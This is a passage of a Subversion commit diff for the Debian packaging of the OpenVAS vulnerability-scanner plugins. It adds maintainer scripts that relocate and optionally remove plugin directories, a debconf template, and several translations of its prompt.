dramatization, fictionalization, motion picture + version, sound recording, art reproduction, abridgment, + condensation, or any other form in which the Work may be recast, + transformed, or adapted, except that a work that constitutes a + Collective Work will not be considered a Derivative Work for the + purpose of this License. For the avoidance of doubt, where the + Work is a musical composition or sound recording, the + synchronization of the Work in timed-relation with a moving image + ("synching") will be considered a Derivative Work for the purpose + of this License. + c. "Licensor" means the individual or entity that offers the Work + under the terms of this License. + d. "Original Author" means the individual or entity who created the + Work. + e. "Work" means the copyrightable work of authorship offered under + the terms of this License. + f. "You" means an individual or entity exercising rights under this + License who has not previously violated the terms of this License + with respect to the Work, or who has received express permission + from the Licensor to exercise rights under this License despite a + previous violation. + g. "License Elements" means the following high-level license + attributes as selected by Licensor and indicated in the title of + this License: Attribution, ShareAlike. + + 2. Fair Use Rights. Nothing in this license is intended to reduce, + limit, or restrict any rights arising from fair use, first sale or + other limitations on the exclusive rights of the copyright owner under + copyright law or other applicable laws. + + 3. License Grant. Subject to the terms and conditions of this License, + Licensor hereby grants You a worldwide, royalty-free, non-exclusive, + perpetual (for the duration of the applicable copyright) license to + exercise the rights in the Work as stated below: + a. to reproduce the Work, to incorporate the Work into one or more + Collective Works, and to reproduce the Work as incorporated in the + Collective Works; + b. to create and reproduce Derivative Works; + c. to distribute copies or phonorecords of, display publicly, perform + publicly, and perform publicly by means of a digital audio + transmission the Work including as incorporated in Collective + Works; + d. to distribute copies or phonorecords of, display publicly, perform + publicly, and perform publicly by means of a digital audio + transmission Derivative Works. + e. For the avoidance of doubt, where the work is a musical + composition: + i. Performance Royalties Under Blanket Licenses. Licensor waives + the exclusive right to collect, whether individually or via a + performance rights society (e.g. ASCAP, BMI, SESAC), + royalties for the public performance or public digital + performance (e.g. webcast) of the Work. + ii. Mechanical Rights and Statutory Royalties. Licensor waives + the exclusive right to collect, whether individually or via a + music rights society or designated agent (e.g. Harry Fox + Agency), royalties for any phonorecord You create from the + Work ("cover version") and distribute, subject to the + compulsory license created by 17 USC Section 115 of the US + Copyright Act (or the equivalent in other jurisdictions). + f. Webcasting Rights and Statutory Royalties. For the avoidance of + doubt, where the Work is a sound recording, Licensor waives the + exclusive right to collect, whether individually or via a + performance-rights society (e.g. SoundExchange), royalties for the + public digital performance (e.g. webcast) of the Work, subject to + the compulsory license created by 17 USC Section 114 of the US + Copyright Act (or the equivalent in other jurisdictions). + + The above rights may be exercised in all media and formats whether now + known or hereafter devised. The above rights include the right to make + such modifications as are technically necessary to exercise the rights + in other media and formats. All rights not expressly granted by + Licensor are hereby reserved. + + 4. Restrictions.The license granted in Section 3 above is expressly + made subject to and limited by the following restrictions: + a. You may distribute, publicly display, publicly perform, or + publicly digitally perform the Work only under the terms of this + License, and You must include a copy of, or the Uniform Resource + Identifier for, this License with every copy or phonorecord of the + Work You distribute, publicly display, publicly perform, or + publicly digitally perform. You may not offer or impose any terms + on the Work that alter or restrict the terms of this License or + the recipients' exercise of the rights granted hereunder. You may + not sublicense the Work. You must keep intact all notices that + refer to this License and to the disclaimer of warranties. You may + not distribute, publicly display, publicly perform, or publicly + digitally perform the Work with any technological measures that + control access or use of the Work in a manner inconsistent with + the terms of this License Agreement. The above applies to the Work + as incorporated in a Collective Work, but this does not require + the Collective Work apart from the Work itself to be made subject + to the terms of this License. If You create a Collective Work, + upon notice from any Licensor You must, to the extent practicable, + remove from the Collective Work any reference to such Licensor or + the Original Author, as requested. If You create a Derivative + Work, upon notice from any Licensor You must, to the extent + practicable, remove from the Derivative Work any reference to such + Licensor or the Original Author, as requested. + b. You may distribute, publicly display, publicly perform, or + publicly digitally perform a Derivative Work only under the terms + of this License, a later version of this License with the same + License Elements as this License, or a Creative Commons iCommons + license that contains the same License Elements as this License + (e.g. Attribution-ShareAlike 2.0 Japan). You must include a copy + of, or the Uniform Resource Identifier for, this License or other + license specified in the previous sentence with every copy or + phonorecord of each Derivative Work You distribute, publicly + display, publicly perform, or publicly digitally perform. You may + not offer or impose any terms on the Derivative Works that alter + or restrict the terms of this License or the recipients' exercise + of the rights granted hereunder, and You must keep intact all + notices that refer to this License and to the disclaimer of + warranties. You may not distribute, publicly display, publicly + perform, or publicly digitally perform the Derivative Work with + any technological measures that control access or use of the Work + in a manner inconsistent with the terms of this License Agreement. + The above applies to the Derivative Work as incorporated in a + Collective Work, but this does not require the Collective Work + apart from the Derivative Work itself to be made subject to the + terms of this License. + c. If you distribute, publicly display, publicly perform, or publicly + digitally perform the Work or any Derivative Works or Collective + Works, You must keep intact all copyright notices for the Work and + give the Original Author credit reasonable to the medium or means + You are utilizing by conveying the name (or pseudonym if + applicable) of the Original Author if supplied; the title of the + Work if supplied; to the extent reasonably practicable, the + Uniform Resource Identifier, if any, that Licensor specifies to be + associated with the Work, unless such URI does not refer to the + copyright notice or licensing information for the Work; and in the + case of a Derivative Work, a credit identifying the use of the + Work in the Derivative Work (e.g., "French translation of the Work + by Original Author," or "Screenplay based on original Work by + Original Author"). Such credit may be implemented in any + reasonable manner; provided, however, that in the case of a + Derivative Work or Collective Work, at a minimum such credit will + appear where any other comparable authorship credit appears and in + a manner at least as prominent as such other comparable authorship + credit. + + 5. Representations, Warranties and Disclaimer + + UNLESS OTHERWISE AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS + THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND + CONCERNING THE MATERIALS, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, + INCLUDING, WITHOUT LIMITATION, WARRANTIES OF TITLE, MERCHANTIBILITY, + FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT, OR THE ABSENCE OF + LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE OF + ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW + THE EXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY + TO YOU. + + 6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY + APPLICABLE LAW, IN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY + LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR + EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, + EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. + + 7. Termination + a. This License and the rights granted hereunder will terminate + automatically upon any breach by You of the terms of this License. + Individuals or entities who have received Derivative Works or + Collective Works from You under this License, however, will not + have their licenses terminated provided such individuals or + entities remain in full compliance with those licenses. Sections + 1, 2, 5, 6, 7, and 8 will survive any termination of this License. + b. Subject to the above terms and conditions, the license granted + here is perpetual (for the duration of the applicable copyright in + the Work). Notwithstanding the above, Licensor reserves the right + to release the Work under different license terms or to stop + distributing the Work at any time; provided, however that any such + election will not serve to withdraw this License (or any other + license that has been, or is required to be, granted under the + terms of this License), and this License will continue in full + force and effect unless terminated as stated above. + + 8. Miscellaneous + a. Each time You distribute or publicly digitally perform the Work or + a Collective Work, the Licensor offers to the recipient a license + to the Work on the same terms and conditions as the license + granted to You under this License. + b. Each time You distribute or publicly digitally perform a + Derivative Work, Licensor offers to the recipient a license to the + original Work on the same terms and conditions as the license + granted to You under this License. + c. If any provision of this License is invalid or unenforceable under + applicable law, it shall not affect the validity or enforceability + of the remainder of the terms of this License, and without further + action by the parties to this agreement, such provision shall be + reformed to the minimum extent necessary to make such provision + valid and enforceable. + d. No term or provision of this License shall be deemed waived and no + breach consented to unless such waiver or consent shall be in + writing and signed by the party to be charged with such waiver or + consent. + e. This License constitutes the entire agreement between the parties + with respect to the Work licensed here. There are no + understandings, agreements or representations with respect to the + Work not specified here. Licensor shall not be bound by any + additional provisions that may appear in any communication from + You. This License may not be modified without the mutual written + agreement of the Licensor and You. + + Creative Commons is not a party to this License, and makes no warranty + whatsoever in connection with the Work. Creative Commons will not be + liable to You or any party on any legal theory for any damages + whatsoever, including without limitation any general, special, + incidental or consequential damages arising in connection to this + license. Notwithstanding the foregoing two (2) sentences, if Creative + Commons has expressly identified itself as the Licensor hereunder, it + shall have all rights and obligations of Licensor. + + Except for the limited purpose of indicating to the public that the + Work is licensed under the CCPL, neither party will use the trademark + "Creative Commons" or any related trademark or logo of Creative + Commons without the prior written consent of Creative Commons. Any + permitted use will be in compliance with Creative Commons' + then-current trademark usage guidelines, as may be published on its + website or otherwise made available upon request from time to time. + + Creative Commons may be contacted at http://creativecommons.org/. + +Other plugins +------------ + +The following plugins do not hold a GPL license: + +netware_post_perl.nasl is (c) 2002 visigoth + + This script is distributed under a BSD style license + allowing free use and continued development provided + the above Copyright message remains. + Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,60 @@ +#!/bin/sh -e +# Config script for openvas-plugins +# (c) 2003-2007 Javier Fernández-Sanguino +# Some ideas stolen from the geneweb package (and contributed by +# Christian Perrier) + +. /usr/share/debconf/confmodule +db_version 2.0 || [ $? -lt 30 ] +db_title "OpenVAS plugins" + + +find_updated_plugs () { + DIST_PLIST=`mktemp` + ORIG_PLIST=`mktemp` + cat $OPENVASPLIST | sort > $DIST_PLIST + find $PLUGINDIR -maxdepth 1 -type f | sort > $ORIG_PLIST + comm -13 $DIST_PLIST $ORIG_PLIST + rm -f $ORIG_PLIST $DIST_PLIST + return 0 +} + +PLUGINDIR=/var/lib/openvas/plugins/ +OPENVASPLIST=/var/lib/dpkg/info/openvas-plugins.list +MAX_ENTRIES=5 +[ -d $PLUGINDIR ] && ( [ "$1" = "configure" ] || [ "$1" = "reconfigure" ] ) && { +# We need to remove _all_ the plugins in the previous installation +# otherwise there might be stuff which we do not want + + newplugs="`find_updated_plugs`" + if [ -n "$newplugs" ] ; then + countnewplugs="`echo $newplugs |wc -l`" + else + countnewplugs=0 + fi + if [ -n "$newplugs" ] || [ "$1" = "reconfigure" ] ; then + +# I'm not convinced that there is any need to list all the plugins +# which are new here. This question could even be asked regardless +# of wether there are new plugins or not... (jfs) +# if [ $countnewplugs -gt $MAX_ENTRIES ] ; then + # List should be limited to, say, 5 entries at most to avoid + # filling up the screen +# newplugs="`echo $newplugs |head -$MAX_ENTRIES`" +# newplugs="$newplugs (...)" +# fi +# newplugs=`echo $newplugs | perl -pe 's/\n/, /g'` +# db_subst openvas-plugins/remove_unknown newplugs "$newplugs" || true + +# This will give an indication of the stuff that will be removed + db_subst openvas-plugins/remove_unknown countnewplugs "$countnewplugs" || true +# Ask the question + db_input medium openvas-plugins/remove_unknown || true + fi +} + +#DEBHELPER# + +db_go + +exit 0 Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs 2009-10-06 22:38:55 UTC (rev 5408) @@ -1,2 +1,3 @@ -usr/lib/openvas/plugins +var/lib/openvas/.desc-plugins var/lib/openvas/plugins +var/lib/openvas/plugins-factory Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,48 @@ +#!/bin/sh -e +# Postinst script for openvas-plugins +# (c) 2003-2007 Javier Fernández-Sanguino + +. /usr/share/debconf/confmodule +db_version 2.0 +test $DEBIAN_SCRIPT_DEBUG && set -v -x + + +# Note, This is far from optimal and might take some time to run. +# (and we have to do it again since we cannot preserve it through +# configure/postinst calls) +find_updated_plugs () { + DIST_PLIST=`mktemp` + ORIG_PLIST=`mktemp` + cat $OPENVASPLIST | sort > $DIST_PLIST + find $PLUGINDIR -maxdepth 1 -type f | sort > $ORIG_PLIST + comm -13 $DIST_PLIST $ORIG_PLIST + rm -f $ORIG_PLIST $DIST_PLIST + return 0 +} + +PLUGINDIR=/var/lib/openvas/plugins/ +OPENVASPLIST=/var/lib/dpkg/info/openvas-plugins.list +if [ "$1" = "configure" ] && [ -d $PLUGINDIR ]; then + db_get openvas-plugins/remove_unknown || true + REMOVE="$RET" + if [ "$REMOVE" = "true" ] ; then + newplugs="`find_updated_plugs`" + if [ -n "$newplugs" ] ; then + echo $newplugs | xargs -r rm -f + fi + fi +fi + +# Revert the change introduced in 2.0.10a-4, since +# now all plugins are in /var/ +if [ -d /var/lib/openvas/.desc-plugins ] && \ + [ -d /var/lib/openvas/plugins ] ; then + [ -L /var/lib/openvas/plugins/.desc ] && rm -f /var/lib/openvas/plugins/.desc + if [ ! -e /var/lib/openvas/plugins/.desc ]; then + mv /var/lib/openvas/.desc-plugins /var/lib/openvas/plugins/.desc + fi +fi + +#DEBHELPER# + +exit 0 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,32 @@ +#!/bin/sh -e + +if [ "$1" = "purge" ] && [ -d /usr/lib/openvas/plugins ]; then + echo "" + echo "The /usr/lib/openvas/plugins directory still exists." + echo "This might be because you downloaded additional plugins into it" + echo "when using a previous Nessus version." + echo -n "Do you want to remove the full directory now? " + read ANSWER + case $ANSWER in + [yY]*) rm -rf /usr/lib/openvas/plugins ;; + esac +fi + +if [ "$1" = "purge" ] && [ -d /var/lib/openvas/plugins ]; then + echo "" + echo "The /var/lib/openvas/plugins directory still exists." + echo "This might be because you downloaded additional plugins into it." + if [ -d /var/lib/openvas/plugins/.desc ]; then + echo "Or because the openvasd package was not fully purged." + fi + echo "" + echo -n "Do you want to remove the full directory now? " + read ANSWER + case $ANSWER in + [yY]*) rm -rf /var/lib/openvas/plugins ;; + esac +fi + +#DEBHELPER# + +exit 0 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,39 @@ +#!/bin/sh -e +# Preinst script for openvas-plugins +# (c) 2004-2007 Javier Fernández-Sanguino + +PLUGINDIR=/var/lib/openvas/ +OPLUGINDIR=/usr/lib/openvas/ + +# Basicly, check if there is anything + +[ ! -d $OPLUGINDIR ] && exit 0 + +echo -n "Moving plugins from $OPLUGINDIR to $PLUGINDIR..." +if [ ! -d $PLUGINDIR ] ; then + mkdir -p $PLUGINDIR + chown root:root $PLUGINDIR + chmod 0766 $PLUGINDIR +fi + +# Now, we don't care about descriptions, they will be regenerated +[ -d "$OPLUGINDIR/.desc" ] && rm -rf $OPLUGINDIR/.desc +[ ! -d "$PLUGINDIR/.desc" ] && mkdir $PLUGINDIR/.desc + +find $OPLUGINDIR -maxdepth 1 -mindepth 1 | +while read content; do + base=`basename $content` + if [ -e "$PLUGINDIR/$base" ]; then + cp -a "$OPLUGINDIR/$base" $PLUGINDIR + rm -rf "$OPLUGINDIR/$base" + else + mv "$OPLUGINDIR/$base" $PLUGINDIR + fi +done + + +echo ".done" + +#DEBHELPER# + +exit 0 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,12 @@ +Template: openvas-plugins/remove_unknown +Type: boolean +Default: false +_Description: Remove unknown OpenVAS plugins? + The /var/lib/openvas/plugins directory includes some unknown plugins. This + is probably because you downloaded additional plugins into it (e.g. by + running openvas-update-plugins). You currently have ${countnewplugs} + plugin(s) which are not provided by this package. + . + Note: This will apply to all your new installations/upgrades of this package + until you reconfigure it. You should say 'No' if you plan to + use openvas-update-plugins in the future. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list 2009-10-06 22:38:55 UTC (rev 5408) @@ -1 +1,3 @@ -10_fix_install_permissions.dpatch +01_makefile_fix_distclean.dpatch +02_adjust_examples.dpatch +03_makefile_clean_space.dpatch Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch 2009-10-06 22:38:55 UTC (rev 5408) @@ -1,18 +0,0 @@ -#! /bin/sh /usr/share/dpatch/dpatch-run -## 10_fix_install_permissions.dpatch by Jan Wagner -## -## DP: fix permissions for shared libraries - - at DPATCH@ -diff -urNad openvas-plugins-1.0.7~/Makefile openvas-plugins-1.0.7/Makefile ---- openvas-plugins-1.0.7~/Makefile 2009-04-17 11:56:08.000000000 +0200 -+++ openvas-plugins-1.0.7/Makefile 2009-09-18 12:41:31.000000000 +0200 -@@ -33,7 +33,7 @@ - - install-nes: install-dirs - for plugins in bin/*.nes; do \ -- $(INSTALL) -m 555 $$plugins \ -+ $(INSTALL) -m 444 $$plugins \ - $(DESTDIR)${libdir}/openvas/plugins; \ - done - Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/POTFILES.in =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/POTFILES.in 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/POTFILES.in 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1 @@ +[type: gettext/rfc822deb] openvas-plugins.templates Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ca.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ca.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ca.po 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,70 @@ +# nessus-plugins (debconf) translation to Catalan. +# Copyright (C) 2004 Free Software Foundation, Inc. +# Aleix Badia i Bosch , 2004 +# Matt Boner , 2004 +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins_2.0.10a-2_templates\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2004-03-12 19:46GMT\n" +"Last-Translator: Aleix Badia i Bosch \n" +"Language-Team: Catalan \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Voleu suprimir els connectors desconeguts del Nessus?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"En el directori /var/lib/nessus/plugins hi ha diversos connectors " +"desconeguts. Probablement es degui a que hi heu baixat connectors " +"addicionals (ex. executant el programa nessus-update-plugins). Actualment " +"teniu ${countnewplugs} connectors que no els proporciona el paquet." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Nota: s'aplicarà a totes les noves instal·lacions/actualitzacions del paquet " +"fins que el reconfigureu. Si teniu intenció d'utilitzar el nessus-pupdate-" +"plugins en un futur contesteu 'No'." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Tot i això, si heu baixat connectors per a una versió antiga del Nessus " +#~ "(per exemple de la 1.x) probablement no funcionin correctament amb les " +#~ "versions noves i és aconsellable suprimir-los." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/cs.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/cs.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/cs.po 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,78 @@ +# +# Translators, if you are not familiar with the PO format, gettext +# documentation is worth reading, especially sections dedicated to +# this format, e.g. by running: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# +# Some information specific to po-debconf are available at +# /usr/share/doc/po-debconf/README-trans +# or http://www.debian.org/intl/l10n/po-debconf/README-trans +# +# Developers do not need to manually edit POT or PO files. +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2005-03-05 16:31+0100\n" +"Last-Translator: Miroslav Kure \n" +"Language-Team: Czech \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=ISO-8859-2\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Odstranit neznámé moduly Nessusu?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"Adresáø /var/lib/nessus/plugins obsahuje nìjaké neznámé moduly. To je " +"pravdìpodobnì zpùsobeno tím, ¾e jste je stáhli ruènì (tøeba skriptem nessus-" +"update-plugins). Momentálnì máte nainstalováno ${countnewplugs} modulù, " +"které nejsou poskytovány tímto balíkem." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Poznámka: Nastavení se bude vztahovat na v¹echny nové instalace/aktualizace " +"tohoto balíku do té doby, ne¾ jej pøekonfigurujete. Plánujete-li v budoucnu " +"pou¾ívat nessus-update-plugins, mìli byste odpovìdìt 'Ne'." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Jestli¾e jste stáhli moduly pro star¹í verzi Nessusu (napø. 1.x), není " +#~ "zaruèeno, ¾e budou pracovat s novìj¹ími verzemi programu a nìkdy je lep¹í " +#~ "je smazat." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/da.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/da.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/da.po 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,68 @@ +# translation of nessus-plugins_2.0.9-2_templates.po to Danish +# Claus Hindsgaul , 2004. +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins_2.0.9-2_templates\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2004-02-18 20:43+0100\n" +"Last-Translator: Claus Hindsgaul \n" +"Language-Team: Danish \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" +"X-Generator: KBabel 1.0.2\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Fjern ukendte Nessus-indstik?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"Mappen /var/lib/nessus/plugins indeholder nogle ukendte indstik. Det er " +"sikkert fordi du har hentet yderligere indstik (f.eks. ved at køre nssus-" +"update-plugins). Du har ${countnewplugs} indstik, som ikke hører til pakken." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Bemærk: Dette vil gælde for alle dine nyinstallationer og opgraderinger af " +"denne pakke, indtil du omkonfigurerer den. Du bør afvise, hvis du regner med " +"at bruge nessus-update-plugins i fremtiden." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Dog, hvis du har hentet indstik til en ældre Nessus-version (f.eks. 1.x), " +#~ "kan det være at de ikke fungerer ordentligt med nyere Nessus-versioner, " +#~ "sÃ¥ det er nogle gange tilrÃ¥deligt at fjerne dem." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/de.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/de.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/de.po 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,79 @@ +# +# Translators, if you are not familiar with the PO format, gettext +# documentation is worth reading, especially sections dedicated to +# this format, e.g. by running: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# Some information specific to po-debconf are available at +# /usr/share/doc/po-debconf/README-trans +# or http://www.debian.org/intl/l10n/po-debconf/README-trans# +# Developers do not need to manually edit POT or PO files. +# Erik Schanze , 2004. +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins_2.0.12-1_templates\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2004-08-10 16:00+0200\n" +"Last-Translator: Erik Schanze \n" +"Language-Team: German \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" +"X-Generator: KBabel 1.3.1\n" +"Plural-Forms: nplurals=2; plural=(n != 1);\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Unbekannte Nessus-Plugins entfernen?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by 